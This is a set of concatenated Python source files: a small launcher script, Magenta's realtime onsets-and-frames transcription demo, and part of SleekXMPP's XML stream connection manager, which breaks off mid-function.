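    for line in ordered_results:
        print('\t', line)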
if __name__ == '__main__':
freeze_support()
test()
|
run.py
|
import threading
import subprocess
import os
def runTouch():
subprocess.call("python3 " + os.path.dirname(os.path.realpath(__file__)) + "/touch.py", shell=True)
def runPage():
subprocess.call("chromium-browser --allow-insecure-localhost --start-fullscreen \"" + os.path.dirname(os.path.realpath(__file__)) + "/index.html\"", shell=True)
touchThread = threading.Thread(target=runTouch)
touchThread.start()
pageThread = threading.Thread(target=runPage)
pageThread.start()
touchThread.join()
pageThread.join()
|
onsets_frames_transcription_realtime.py
|
# Copyright 2020 The Magenta Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Experimental realtime transcription demo."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import multiprocessing
import threading
from absl import app
from absl import flags
import attr
from colorama import Fore
from colorama import Style
from magenta.models.onsets_frames_transcription.realtime import audio_recorder
from magenta.models.onsets_frames_transcription.realtime import tflite_model
import numpy as np
flags.DEFINE_string('model_path', 'onsets_frames_wavinput.tflite',
'File path of TFlite model.')
flags.DEFINE_string('mic', None, 'Optional: Input source microphone ID.')
flags.DEFINE_float('mic_amplify', 30.0, 'Multiply raw audio mic input')
flags.DEFINE_string(
'wav_file', None,
'If specified, will decode the first 10 seconds of this wav file.')
flags.DEFINE_integer(
'sample_rate_hz', 16000,
'Sample Rate. The model expects 16000. However, some microphones do not '
    'support sampling at this rate. In that case use --sample_rate_hz 48000 and '
'the code will automatically downsample to 16000')
FLAGS = flags.FLAGS
class TfLiteWorker(multiprocessing.Process):
"""Process for executing TFLite inference."""
def __init__(self, model_path, task_queue, result_queue):
multiprocessing.Process.__init__(self)
self._model_path = model_path
self._task_queue = task_queue
self._result_queue = result_queue
self._model = None
def setup(self):
if self._model is not None:
return
self._model = tflite_model.Model(model_path=self._model_path)
def run(self):
self.setup()
while True:
task = self._task_queue.get()
if task is None:
self._task_queue.task_done()
return
task(self._model)
self._task_queue.task_done()
self._result_queue.put(task)
@attr.s
class AudioChunk(object):
serial = attr.ib()
samples = attr.ib(repr=lambda w: '{} {}'.format(w.shape, w.dtype))
class AudioQueue(object):
"""Audio queue."""
def __init__(self, callback, audio_device_index, sample_rate_hz,
model_sample_rate, frame_length, overlap):
# Initialize recorder.
downsample_factor = sample_rate_hz / model_sample_rate
self._recorder = audio_recorder.AudioRecorder(
sample_rate_hz,
downsample_factor=downsample_factor,
device_index=audio_device_index)
self._frame_length = frame_length
self._overlap = overlap
self._audio_buffer = np.array([], dtype=np.int16).reshape(0, 1)
self._chunk_counter = 0
self._callback = callback
def start(self):
"""Start processing the queue."""
with self._recorder:
timed_out = False
while not timed_out:
assert self._recorder.is_active
new_audio = self._recorder.get_audio(self._frame_length -
len(self._audio_buffer))
audio_samples = np.concatenate(
(self._audio_buffer, new_audio[0] * FLAGS.mic_amplify))
# Extract overlapping
first_unused_byte = 0
for pos in range(0, audio_samples.shape[0] - self._frame_length,
self._frame_length - self._overlap):
self._callback(
AudioChunk(self._chunk_counter,
audio_samples[pos:pos + self._frame_length]))
self._chunk_counter += 1
first_unused_byte = pos + self._frame_length
# Keep the remaining bytes for next time
self._audio_buffer = audio_samples[first_unused_byte:]
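        # Hedged worked example (hypothetical numbers, not from this code):
        # with frame_length=17920 samples and overlap=2048, the loop above
        # starts a new chunk every 17920 - 2048 = 15872 samples, so adjacent
        # chunks share 2048 samples; anything after the last full frame is
        # kept in self._audio_buffer for the next pass.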
# This actually executes in each worker process!
class OnsetsTask(object):
"""Inference task."""
def __init__(self, audio_chunk: AudioChunk):
self.audio_chunk = audio_chunk
self.result = None
def __call__(self, model):
samples = self.audio_chunk.samples[:, 0]
self.result = model.infer(samples)
self.timestep = model.get_timestep()
def result_collector(result_queue):
"""Collect and display results."""
def notename(n, space):
if space:
return [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
' '][n % 12]
return [
Fore.BLUE + 'A' + Style.RESET_ALL,
Fore.LIGHTBLUE_EX + 'A#' + Style.RESET_ALL,
Fore.GREEN + 'B' + Style.RESET_ALL,
Fore.CYAN + 'C' + Style.RESET_ALL,
Fore.LIGHTCYAN_EX + 'C#' + Style.RESET_ALL,
Fore.RED + 'D' + Style.RESET_ALL,
Fore.LIGHTRED_EX + 'D#' + Style.RESET_ALL,
Fore.YELLOW + 'E' + Style.RESET_ALL,
Fore.WHITE + 'F' + Style.RESET_ALL,
Fore.LIGHTBLACK_EX + 'F#' + Style.RESET_ALL,
Fore.MAGENTA + 'G' + Style.RESET_ALL,
Fore.LIGHTMAGENTA_EX + 'G#' + Style.RESET_ALL,
][n % 12] # + str(n//12)
print('Listening to results..')
# TODO(mtyka) Ensure serial stitching of results (no guarantee that
# the blocks come in in order but they are all timestamped)
while True:
result = result_queue.get()
serial = result.audio_chunk.serial
result_roll = result.result
if serial > 0:
result_roll = result_roll[4:]
for notes in result_roll:
for i in range(6, len(notes) - 6):
note = notes[i]
is_frame = note[0] > 0.0
notestr = notename(i, not is_frame)
print(notestr, end='')
print('|')
def main(argv):
if len(argv) > 1:
raise app.UsageError('Too many command-line arguments.')
results = multiprocessing.Queue()
results_thread = threading.Thread(target=result_collector, args=(results,))
results_thread.start()
model = tflite_model.Model(model_path=FLAGS.model_path)
overlap_timesteps = 4
overlap_wav = model.get_hop_size(
) * overlap_timesteps + model.get_window_length()
if FLAGS.wav_file:
wav_data = open(FLAGS.wav_file, 'rb').read()
samples = audio_recorder.wav_data_to_samples(wav_data,
model.get_sample_rate())
samples = samples[:model.get_sample_rate() *
10] # Only the first 10 seconds
samples = samples.reshape((-1, 1))
samples_length = samples.shape[0]
# Extend samples with zeros
samples = np.pad(
samples, (0, model.get_input_wav_length()), mode='constant')
for i, pos in enumerate(
range(0, samples_length - model.get_input_wav_length() + overlap_wav,
model.get_input_wav_length() - overlap_wav)):
chunk = samples[pos:pos + model.get_input_wav_length()]
task = OnsetsTask(AudioChunk(i, chunk))
task(model)
results.put(task)
else:
tasks = multiprocessing.JoinableQueue()
## Make and start the workers
num_workers = 4
workers = [
TfLiteWorker(FLAGS.model_path, tasks, results)
for i in range(num_workers)
]
for w in workers:
w.start()
audio_feeder = AudioQueue(
callback=lambda audio_chunk: tasks.put(OnsetsTask(audio_chunk)),
audio_device_index=FLAGS.mic if FLAGS.mic is None else int(FLAGS.mic),
sample_rate_hz=int(FLAGS.sample_rate_hz),
model_sample_rate=model.get_sample_rate(),
frame_length=model.get_input_wav_length(),
overlap=overlap_wav)
audio_feeder.start()
def console_entry_point():
app.run(main)
if __name__ == '__main__':
console_entry_point()
|
xmlstream.py
|
"""
sleekxmpp.xmlstream.xmlstream
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This module provides the module for creating and
interacting with generic XML streams, along with
the necessary eventing infrastructure.
Part of SleekXMPP: The Sleek XMPP Library
:copyright: (c) 2011 Nathanael C. Fritz
:license: MIT, see LICENSE for more details
"""
from __future__ import with_statement, unicode_literals
import base64
import copy
import logging
import signal
import socket as Socket
import ssl
import sys
import threading
import time
import random
import weakref
import uuid
import errno
from xml.parsers.expat import ExpatError
import sleekxmpp
from sleekxmpp.util import Queue, QueueEmpty, safedict
from sleekxmpp.thirdparty.statemachine import StateMachine
from sleekxmpp.xmlstream import Scheduler, tostring, cert
from sleekxmpp.xmlstream.stanzabase import StanzaBase, ET, ElementBase
from sleekxmpp.xmlstream.handler import Waiter, XMLCallback
from sleekxmpp.xmlstream.matcher import MatchXMLMask
from sleekxmpp.xmlstream.resolver import resolve, default_resolver
# In Python 2.x, file socket objects are broken. A patched socket
# wrapper is provided for this case in filesocket.py.
if sys.version_info < (3, 0):
from sleekxmpp.xmlstream.filesocket import FileSocket, Socket26
#: The time in seconds to wait before timing out waiting for response stanzas.
RESPONSE_TIMEOUT = 30
#: The time in seconds to wait for events from the event queue, and also the
#: time between checks for the process stop signal.
WAIT_TIMEOUT = 1.0
#: The number of threads to use to handle XML stream events. This is not the
#: same as the number of custom event handling threads.
#: :data:`HANDLER_THREADS` must be at least 1. For Python implementations
#: with a GIL, this should be left at 1, but for implementations without
#: a GIL increasing this value can provide better performance.
HANDLER_THREADS = 1
#: The time in seconds to delay between attempts to resend data
#: after an SSL error.
SSL_RETRY_DELAY = 0.5
#: The maximum number of times to attempt resending data due to
#: an SSL error.
SSL_RETRY_MAX = 10
#: Maximum time in seconds to delay between connection attempts (ten minutes).
RECONNECT_MAX_DELAY = 600
#: Maximum number of attempts to connect to the server before quitting
#: and raising a 'connect_failed' event. Setting this to ``None`` will
#: allow infinite reconnection attempts, and using ``0`` will disable
#: reconnections. Defaults to ``None``.
RECONNECT_MAX_ATTEMPTS = None
log = logging.getLogger(__name__)
class RestartStream(Exception):
"""
Exception to restart stream processing, including
resending the stream header.
"""
class XMLStream(object):
"""
An XML stream connection manager and event dispatcher.
The XMLStream class abstracts away the issues of establishing a
connection with a server and sending and receiving XML "stanzas".
A stanza is a complete XML element that is a direct child of a root
document element. Two streams are used, one for each communication
direction, over the same socket. Once the connection is closed, both
streams should be complete and valid XML documents.
Three types of events are provided to manage the stream:
:Stream: Triggered based on received stanzas, similar in concept
to events in a SAX XML parser.
:Custom: Triggered manually.
:Scheduled: Triggered based on time delays.
Typically, stanzas are first processed by a stream event handler which
will then trigger custom events to continue further processing,
especially since custom event handlers may run in individual threads.
:param socket: Use an existing socket for the stream. Defaults to
``None`` to generate a new socket.
:param string host: The name of the target server.
:param int port: The port to use for the connection. Defaults to 0.
"""
def __init__(self, socket=None, host='', port=0, certfile=None,
keyfile=None, ca_certs=None, **kwargs):
#: Most XMPP servers support TLSv1, but OpenFire in particular
#: does not work well with it. For OpenFire, set
#: :attr:`ssl_version` to use ``SSLv23``::
#:
#: import ssl
#: xmpp.ssl_version = ssl.PROTOCOL_SSLv23
self.ssl_version = ssl.PROTOCOL_TLSv1
#: The list of accepted ciphers, in OpenSSL Format.
#: It might be useful to override it for improved security
#: over the python defaults.
self.ciphers = None
#: Path to a file containing certificates for verifying the
#: server SSL certificate. A non-``None`` value will trigger
#: certificate checking.
#:
#: .. note::
#:
#: On Mac OS X, certificates in the system keyring will
#: be consulted, even if they are not in the provided file.
self.ca_certs = ca_certs
#: Path to a file containing a client certificate to use for
#: authenticating via SASL EXTERNAL. If set, there must also
        #: be a corresponding :attr:`keyfile` value.
self.certfile = certfile
#: Path to a file containing the private key for the selected
#: client certificate to use for authenticating via SASL EXTERNAL.
self.keyfile = keyfile
self._der_cert = None
#: The time in seconds to wait for events from the event queue,
#: and also the time between checks for the process stop signal.
self.wait_timeout = WAIT_TIMEOUT
#: The time in seconds to wait before timing out waiting
#: for response stanzas.
self.response_timeout = RESPONSE_TIMEOUT
        #: The current amount of time to delay attempting to reconnect.
#: This value doubles (with some jitter) with each failed
#: connection attempt up to :attr:`reconnect_max_delay` seconds.
self.reconnect_delay = None
        #: Maximum time in seconds to delay between connection attempts (ten minutes by default).
self.reconnect_max_delay = RECONNECT_MAX_DELAY
#: Maximum number of attempts to connect to the server before
#: quitting and raising a 'connect_failed' event. Setting to
#: ``None`` allows infinite reattempts, while setting it to ``0``
#: will disable reconnection attempts. Defaults to ``None``.
self.reconnect_max_attempts = RECONNECT_MAX_ATTEMPTS
#: The time in seconds to delay between attempts to resend data
#: after an SSL error.
self.ssl_retry_max = SSL_RETRY_MAX
#: The maximum number of times to attempt resending data due to
#: an SSL error.
self.ssl_retry_delay = SSL_RETRY_DELAY
#: The connection state machine tracks if the stream is
#: ``'connected'`` or ``'disconnected'``.
self.state = StateMachine(('disconnected', 'connected'))
self.state._set_state('disconnected')
#: The default port to return when querying DNS records.
self.default_port = int(port)
#: The domain to try when querying DNS records.
self.default_domain = ''
#: The expected name of the server, for validation.
self._expected_server_name = ''
self._service_name = ''
#: The desired, or actual, address of the connected server.
self.address = (host, int(port))
#: A file-like wrapper for the socket for use with the
#: :mod:`~xml.etree.ElementTree` module.
self.filesocket = None
self.set_socket(socket)
if sys.version_info < (3, 0):
self.socket_class = Socket26
else:
self.socket_class = Socket.socket
#: Enable connecting to the server directly over SSL, in
#: particular when the service provides two ports: one for
#: non-SSL traffic and another for SSL traffic.
self.use_ssl = False
#: Enable connecting to the service without using SSL
#: immediately, but allow upgrading the connection later
#: to use SSL.
self.use_tls = False
#: If set to ``True``, attempt to connect through an HTTP
#: proxy based on the settings in :attr:`proxy_config`.
self.use_proxy = False
#: If set to ``True``, attempt to use IPv6.
self.use_ipv6 = True
#: If set to ``True``, allow using the ``dnspython`` DNS library
#: if available. If set to ``False``, the builtin DNS resolver
#: will be used, even if ``dnspython`` is installed.
self.use_dnspython = True
#: Use CDATA for escaping instead of XML entities. Defaults
#: to ``False``.
self.use_cdata = False
#: An optional dictionary of proxy settings. It may provide:
#: :host: The host offering proxy services.
#: :port: The port for the proxy service.
#: :username: Optional username for accessing the proxy.
#: :password: Optional password for accessing the proxy.
self.proxy_config = {}
#: The default namespace of the stream content, not of the
#: stream wrapper itself.
self.default_ns = ''
self.default_lang = None
self.peer_default_lang = None
#: The namespace of the enveloping stream element.
self.stream_ns = ''
#: The default opening tag for the stream element.
self.stream_header = "<stream>"
#: The default closing tag for the stream element.
self.stream_footer = "</stream>"
#: If ``True``, periodically send a whitespace character over the
#: wire to keep the connection alive. Mainly useful for connections
#: traversing NAT.
self.whitespace_keepalive = True
#: The default interval between keepalive signals when
#: :attr:`whitespace_keepalive` is enabled.
self.whitespace_keepalive_interval = 300
#: An :class:`~threading.Event` to signal that the application
#: is stopping, and that all threads should shutdown.
self.stop = threading.Event()
#: An :class:`~threading.Event` to signal receiving a closing
#: stream tag from the server.
self.stream_end_event = threading.Event()
self.stream_end_event.set()
#: An :class:`~threading.Event` to signal the start of a stream
#: session. Until this event fires, the send queue is not used
#: and data is sent immediately over the wire.
self.session_started_event = threading.Event()
#: The default time in seconds to wait for a session to start
#: after connecting before reconnecting and trying again.
self.session_timeout = 45
#: Flag for controlling if the session can be considered ended
#: if the connection is terminated.
self.end_session_on_disconnect = True
#: A queue of stream, custom, and scheduled events to be processed.
self.event_queue = Queue()
#: A queue of string data to be sent over the stream.
self.send_queue = Queue(maxsize=256)
self.send_queue_lock = threading.Lock()
self.send_lock = threading.RLock()
#: A :class:`~sleekxmpp.xmlstream.scheduler.Scheduler` instance for
#: executing callbacks in the future based on time delays.
self.scheduler = Scheduler(self.stop)
self.__failed_send_stanza = None
#: A mapping of XML namespaces to well-known prefixes.
self.namespace_map = {StanzaBase.xml_ns: 'xml'}
self.__thread = {}
self.__root_stanza = []
self.__handlers = []
self.__event_handlers = {}
self.__event_handlers_lock = threading.Lock()
self.__filters = {'in': [], 'out': [], 'out_sync': []}
self.__thread_count = 0
self.__thread_cond = threading.Condition()
self.__active_threads = set()
self._use_daemons = False
self._disconnect_wait_for_threads = True
self._id = 0
self._id_lock = threading.Lock()
#: We use an ID prefix to ensure that all ID values are unique.
self._id_prefix = '%s-' % uuid.uuid4()
        #: The :attr:`auto_reconnect` setting controls whether or not
#: the stream will be restarted in the event of an error.
self.auto_reconnect = True
#: The :attr:`disconnect_wait` setting is the default value
#: for controlling if the system waits for the send queue to
#: empty before ending the stream. This may be overridden by
#: passing ``wait=True`` or ``wait=False`` to :meth:`disconnect`.
#: The default :attr:`disconnect_wait` value is ``False``.
self.disconnect_wait = False
#: A list of DNS results that have not yet been tried.
self.dns_answers = []
#: The service name to check with DNS SRV records. For
#: example, setting this to ``'xmpp-client'`` would query the
#: ``_xmpp-client._tcp`` service.
self.dns_service = None
self.add_event_handler('connected', self._session_timeout_check)
self.add_event_handler('disconnected', self._remove_schedules)
self.add_event_handler('session_start', self._start_keepalive)
self.add_event_handler('session_start', self._cert_expiration)
def use_signals(self, signals=None):
"""Register signal handlers for ``SIGHUP`` and ``SIGTERM``.
By using signals, a ``'killed'`` event will be raised when the
application is terminated.
If a signal handler already existed, it will be executed first,
before the ``'killed'`` event is raised.
:param list signals: A list of signal names to be monitored.
Defaults to ``['SIGHUP', 'SIGTERM']``.
"""
if signals is None:
signals = ['SIGHUP', 'SIGTERM']
existing_handlers = {}
for sig_name in signals:
if hasattr(signal, sig_name):
sig = getattr(signal, sig_name)
handler = signal.getsignal(sig)
if handler:
existing_handlers[sig] = handler
def handle_kill(signum, frame):
"""
Capture kill event and disconnect cleanly after first
spawning the ``'killed'`` event.
"""
if signum in existing_handlers and \
existing_handlers[signum] != handle_kill:
existing_handlers[signum](signum, frame)
self.event("killed", direct=True)
self.disconnect()
try:
for sig_name in signals:
if hasattr(signal, sig_name):
sig = getattr(signal, sig_name)
signal.signal(sig, handle_kill)
self.__signals_installed = True
except:
log.debug("Can not set interrupt signal handlers. " + \
"SleekXMPP is not running from a main thread.")
def new_id(self):
"""Generate and return a new stream ID in hexadecimal form.
Many stanzas, handlers, or matchers may require unique
ID values. Using this method ensures that all new ID values
are unique in this stream.
"""
with self._id_lock:
self._id += 1
return self.get_id()
def get_id(self):
"""Return the current unique stream ID in hexadecimal form."""
return "%s%X" % (self._id_prefix, self._id)
def connect(self, host='', port=0, use_ssl=False,
use_tls=True, reattempt=True):
"""Create a new socket and connect to the server.
Setting ``reattempt`` to ``True`` will cause connection
attempts to be made with an exponential backoff delay (max of
        :attr:`reconnect_max_delay` which defaults to 10 minutes) until a
successful connection is established.
:param host: The name of the desired server for the connection.
:param port: Port to connect to on the server.
:param use_ssl: Flag indicating if SSL should be used by connecting
directly to a port using SSL.
:param use_tls: Flag indicating if TLS should be used, allowing for
connecting to a port without using SSL immediately and
later upgrading the connection.
:param reattempt: Flag indicating if the socket should reconnect
after disconnections.
"""
self.stop.clear()
if host and port:
self.address = (host, int(port))
try:
Socket.inet_aton(self.address[0])
except (Socket.error, ssl.SSLError):
self.default_domain = self.address[0]
# Respect previous SSL and TLS usage directives.
if use_ssl is not None:
self.use_ssl = use_ssl
if use_tls is not None:
self.use_tls = use_tls
# Repeatedly attempt to connect until a successful connection
# is established.
attempts = self.reconnect_max_attempts
connected = self.state.transition('disconnected', 'connected',
func=self._connect,
args=(reattempt,))
while reattempt and not connected and not self.stop.is_set():
connected = self.state.transition('disconnected', 'connected',
func=self._connect)
if not connected:
if attempts is not None:
attempts -= 1
if attempts <= 0:
self.event('connection_failed', direct=True)
return False
return connected
def _connect(self, reattempt=True):
self.scheduler.remove('Session timeout check')
if self.reconnect_delay is None:
delay = 1.0
self.reconnect_delay = delay
if reattempt:
delay = min(self.reconnect_delay * 2, self.reconnect_max_delay)
delay = random.normalvariate(delay, delay * 0.1)
log.debug('Waiting %s seconds before connecting.', delay)
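        # Hedged note on the backoff above (illustrative): with the defaults
        # each failed attempt roughly doubles the wait (about 2, 4, 8, ...
        # seconds, with ~10% jitter), capped at reconnect_max_delay.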
elapsed = 0
try:
while elapsed < delay and not self.stop.is_set():
time.sleep(0.1)
elapsed += 0.1
except KeyboardInterrupt:
self.set_stop()
return False
except SystemExit:
self.set_stop()
return False
if self.default_domain:
try:
host, address, port = self.pick_dns_answer(self.default_domain,
self.address[1])
self.address = (address, port)
self._service_name = host
except StopIteration:
log.debug("No remaining DNS records to try.")
self.dns_answers = None
if reattempt:
self.reconnect_delay = delay
return False
af = Socket.AF_INET
proto = 'IPv4'
if ':' in self.address[0]:
af = Socket.AF_INET6
proto = 'IPv6'
try:
self.socket = self.socket_class(af, Socket.SOCK_STREAM)
except Socket.error:
log.debug("Could not connect using %s", proto)
return False
self.configure_socket()
if self.use_proxy:
connected = self._connect_proxy()
if not connected:
if reattempt:
self.reconnect_delay = delay
return False
if self.use_ssl:
log.debug("Socket Wrapped for SSL")
if self.ca_certs is None:
cert_policy = ssl.CERT_NONE
else:
cert_policy = ssl.CERT_REQUIRED
ssl_args = safedict({
'certfile': self.certfile,
'keyfile': self.keyfile,
'ca_certs': self.ca_certs,
'cert_reqs': cert_policy,
'do_handshake_on_connect': False,
"ssl_version": self.ssl_version
})
if sys.version_info >= (2, 7):
ssl_args['ciphers'] = self.ciphers
ssl_socket = ssl.wrap_socket(self.socket, **ssl_args)
if hasattr(self.socket, 'socket'):
# We are using a testing socket, so preserve the top
# layer of wrapping.
self.socket.socket = ssl_socket
else:
self.socket = ssl_socket
try:
if not self.use_proxy:
domain = self.address[0]
if ':' in domain:
domain = '[%s]' % domain
log.debug("Connecting to %s:%s", domain, self.address[1])
self.socket.connect(self.address)
if self.use_ssl:
try:
self.socket.do_handshake()
except (Socket.error, ssl.SSLError):
log.error('CERT: Invalid certificate trust chain.')
if not self.event_handled('ssl_invalid_chain'):
self.disconnect(self.auto_reconnect,
send_close=False)
else:
self.event('ssl_invalid_chain', direct=True)
return False
self._der_cert = self.socket.getpeercert(binary_form=True)
pem_cert = ssl.DER_cert_to_PEM_cert(self._der_cert)
log.debug('CERT: %s', pem_cert)
self.event('ssl_cert', pem_cert, direct=True)
try:
cert.verify(self._expected_server_name, self._der_cert)
except cert.CertificateError as err:
if not self.event_handled('ssl_invalid_cert'):
log.error(err)
self.disconnect(send_close=False)
else:
self.event('ssl_invalid_cert',
pem_cert,
direct=True)
self.set_socket(self.socket, ignore=True)
#this event is where you should set your application state
self.event('connected', direct=True)
return True
except (Socket.error, ssl.SSLError) as serr:
error_msg = "Could not connect to %s:%s. Socket Error #%s: %s"
self.event('socket_error', serr, direct=True)
domain = self.address[0]
if ':' in domain:
domain = '[%s]' % domain
log.error(error_msg, domain, self.address[1],
serr.errno, serr.strerror)
return False
def _connect_proxy(self):
"""Attempt to connect using an HTTP Proxy."""
# Extract the proxy address, and optional credentials
address = (self.proxy_config['host'], int(self.proxy_config['port']))
cred = None
if self.proxy_config['username']:
username = self.proxy_config['username']
password = self.proxy_config['password']
cred = '%s:%s' % (username, password)
if sys.version_info < (3, 0):
cred = bytes(cred)
else:
cred = bytes(cred, 'utf-8')
cred = base64.b64encode(cred).decode('utf-8')
# Build the HTTP headers for connecting to the XMPP server
headers = ['CONNECT %s:%s HTTP/1.0' % self.address,
'Host: %s:%s' % self.address,
'Proxy-Connection: Keep-Alive',
'Pragma: no-cache',
'User-Agent: SleekXMPP/%s' % sleekxmpp.__version__]
if cred:
headers.append('Proxy-Authorization: Basic %s' % cred)
headers = '\r\n'.join(headers) + '\r\n\r\n'
try:
log.debug("Connecting to proxy: %s:%s", *address)
self.socket.connect(address)
self.send_raw(headers, now=True)
resp = ''
while '\r\n\r\n' not in resp and not self.stop.is_set():
resp += self.socket.recv(1024).decode('utf-8')
log.debug('RECV: %s', resp)
lines = resp.split('\r\n')
if '200' not in lines[0]:
self.event('proxy_error', resp)
self.event('connection_failed', direct=True)
log.error('Proxy Error: %s', lines[0])
return False
# Proxy connection established, continue connecting
# with the XMPP server.
return True
except (Socket.error, ssl.SSLError) as serr:
error_msg = "Could not connect to %s:%s. Socket Error #%s: %s"
self.event('socket_error', serr, direct=True)
log.error(error_msg, self.address[0], self.address[1],
serr.errno, serr.strerror)
return False
def _session_timeout_check(self, event=None):
"""
Add check to ensure that a session is established within
a reasonable amount of time.
"""
def _handle_session_timeout():
if not self.session_started_event.is_set():
log.debug("Session start has taken more " + \
"than %d seconds", self.session_timeout)
self.disconnect(reconnect=self.auto_reconnect)
self.schedule("Session timeout check",
self.session_timeout,
_handle_session_timeout)
def disconnect(self, reconnect=False, wait=None, send_close=True):
"""Terminate processing and close the XML streams.
Optionally, the connection may be reconnected and
resume processing afterwards.
If the disconnect should take place after all items
in the send queue have been sent, use ``wait=True``.
.. warning::
If you are constantly adding items to the queue
such that it is never empty, then the disconnect will
not occur and the call will continue to block.
:param reconnect: Flag indicating if the connection
and processing should be restarted.
Defaults to ``False``.
:param wait: Flag indicating if the send queue should
be emptied before disconnecting, overriding
:attr:`disconnect_wait`.
:param send_close: Flag indicating if the stream footer
should be sent before terminating the
connection. Setting this to ``False``
prevents error loops when trying to
disconnect after a socket error.
"""
self.state.transition('connected', 'disconnected',
wait=2.0,
func=self._disconnect,
args=(reconnect, wait, send_close))
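# A minimal usage sketch (illustrative, not part of this module): assuming
# `xmpp` is a connected XMLStream-based client,
#
#     xmpp.disconnect(wait=True)        # flush the send queue, then close
#     xmpp.disconnect(reconnect=True)   # or: close and restart processing
#
# Passing send_close=False skips the closing stream footer, which avoids
# error loops when the socket is already known to be broken.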
def _disconnect(self, reconnect=False, wait=None, send_close=True):
if not reconnect:
self.auto_reconnect = False
if self.end_session_on_disconnect or send_close:
self.event('session_end', direct=True)
# Wait for the send queue to empty.
if wait is not None:
if wait:
self.send_queue.join()
elif self.disconnect_wait:
self.send_queue.join()
# Clearing this event will pause the send loop.
self.session_started_event.clear()
self.__failed_send_stanza = None
# Send the end of stream marker.
if send_close:
self.send_raw(self.stream_footer, now=True)
# Wait for confirmation that the stream was
# closed in the other direction. If we didn't
# send a stream footer we don't need to wait
# since the server won't know to respond.
if send_close:
log.info('Waiting for %s from server', self.stream_footer)
self.stream_end_event.wait(4)
else:
self.stream_end_event.set()
if not self.auto_reconnect:
self.set_stop()
if self._disconnect_wait_for_threads:
self._wait_for_threads()
try:
self.socket.shutdown(Socket.SHUT_RDWR)
self.socket.close()
self.filesocket.close()
except (Socket.error, ssl.SSLError) as serr:
self.event('socket_error', serr, direct=True)
finally:
# Clear your application state.
self.event('disconnected', direct=True)
return True
def abort(self):
self.session_started_event.clear()
self.set_stop()
if self._disconnect_wait_for_threads:
self._wait_for_threads()
try:
self.socket.shutdown(Socket.SHUT_RDWR)
self.socket.close()
self.filesocket.close()
except Socket.error:
pass
self.state.transition_any(['connected', 'disconnected'], 'disconnected', func=lambda: True)
self.event("killed", direct=True)
def reconnect(self, reattempt=True, wait=False, send_close=True):
"""Reset the stream's state and reconnect to the server."""
log.debug("reconnecting...")
if self.state.ensure('connected'):
self.state.transition('connected', 'disconnected',
wait=2.0,
func=self._disconnect,
args=(True, wait, send_close))
attempts = self.reconnect_max_attempts
log.debug("connecting...")
connected = self.state.transition('disconnected', 'connected',
wait=2.0,
func=self._connect,
args=(reattempt,))
while reattempt and not connected and not self.stop.is_set():
connected = self.state.transition('disconnected', 'connected',
wait=2.0, func=self._connect)
connected = connected or self.state.ensure('connected')
if not connected:
if attempts is not None:
attempts -= 1
if attempts <= 0:
self.event('connection_failed', direct=True)
return False
return connected
def set_socket(self, socket, ignore=False):
"""Set the socket to use for the stream.
The filesocket will be recreated as well.
:param socket: The new socket object to use.
:param bool ignore: If ``True``, don't set the connection
state to ``'connected'``.
"""
self.socket = socket
if socket is not None:
# ElementTree.iterparse requires a file.
# 0 buffer files have to be binary.
# Use the correct fileobject type based on the Python
# version to work around a broken implementation in
# Python 2.x.
if sys.version_info < (3, 0):
self.filesocket = FileSocket(self.socket)
else:
self.filesocket = self.socket.makefile('rb', 0)
if not ignore:
self.state._set_state('connected')
def configure_socket(self):
"""Set timeout and other options for self.socket.
Meant to be overridden.
"""
self.socket.settimeout(None)
def configure_dns(self, resolver, domain=None, port=None):
"""
Configure and set options for a :class:`~dns.resolver.Resolver`
instance, and other DNS related tasks. For example, you
can also check :meth:`~socket.socket.getaddrinfo` to see
if you need to call out to ``libresolv.so.2`` to
run ``res_init()``.
Meant to be overridden.
:param resolver: A :class:`~dns.resolver.Resolver` instance
or ``None`` if ``dnspython`` is not installed.
:param domain: The initial domain under consideration.
:param port: The initial port under consideration.
"""
pass
def start_tls(self):
"""Perform handshakes for TLS.
If the handshake is successful, the XML stream will need
to be restarted.
"""
log.info("Negotiating TLS")
ssl_versions = {3: 'TLS 1.0', 1: 'SSL 3', 2: 'SSL 2/3'}
log.info("Using SSL version: %s", ssl_versions[self.ssl_version])
if self.ca_certs is None:
cert_policy = ssl.CERT_NONE
else:
cert_policy = ssl.CERT_REQUIRED
ssl_args = safedict({
'certfile': self.certfile,
'keyfile': self.keyfile,
'ca_certs': self.ca_certs,
'cert_reqs': cert_policy,
'do_handshake_on_connect': False,
"ssl_version": self.ssl_version
})
if sys.version_info >= (2, 7):
ssl_args['ciphers'] = self.ciphers
ssl_socket = ssl.wrap_socket(self.socket, **ssl_args)
if hasattr(self.socket, 'socket'):
# We are using a testing socket, so preserve the top
# layer of wrapping.
self.socket.socket = ssl_socket
else:
self.socket = ssl_socket
try:
self.socket.do_handshake()
except (Socket.error, ssl.SSLError):
log.error('CERT: Invalid certificate trust chain.')
if not self.event_handled('ssl_invalid_chain'):
self.disconnect(self.auto_reconnect, send_close=False)
else:
self._der_cert = self.socket.getpeercert(binary_form=True)
self.event('ssl_invalid_chain', direct=True)
return False
self._der_cert = self.socket.getpeercert(binary_form=True)
pem_cert = ssl.DER_cert_to_PEM_cert(self._der_cert)
log.debug('CERT: %s', pem_cert)
self.event('ssl_cert', pem_cert, direct=True)
try:
cert.verify(self._expected_server_name, self._der_cert)
except cert.CertificateError as err:
if not self.event_handled('ssl_invalid_cert'):
log.error(err)
self.disconnect(self.auto_reconnect, send_close=False)
else:
self.event('ssl_invalid_cert', pem_cert, direct=True)
self.set_socket(self.socket)
return True
def _cert_expiration(self, event):
"""Schedule an event for when the TLS certificate expires."""
if not self.use_tls and not self.use_ssl:
return
if not self._der_cert:
log.warn("TLS or SSL was enabled, but no certificate was found.")
return
def restart():
if not self.event_handled('ssl_expired_cert'):
log.warn("The server certificate has expired. Restarting.")
self.reconnect()
else:
pem_cert = ssl.DER_cert_to_PEM_cert(self._der_cert)
self.event('ssl_expired_cert', pem_cert)
cert_ttl = cert.get_ttl(self._der_cert)
if cert_ttl is None:
return
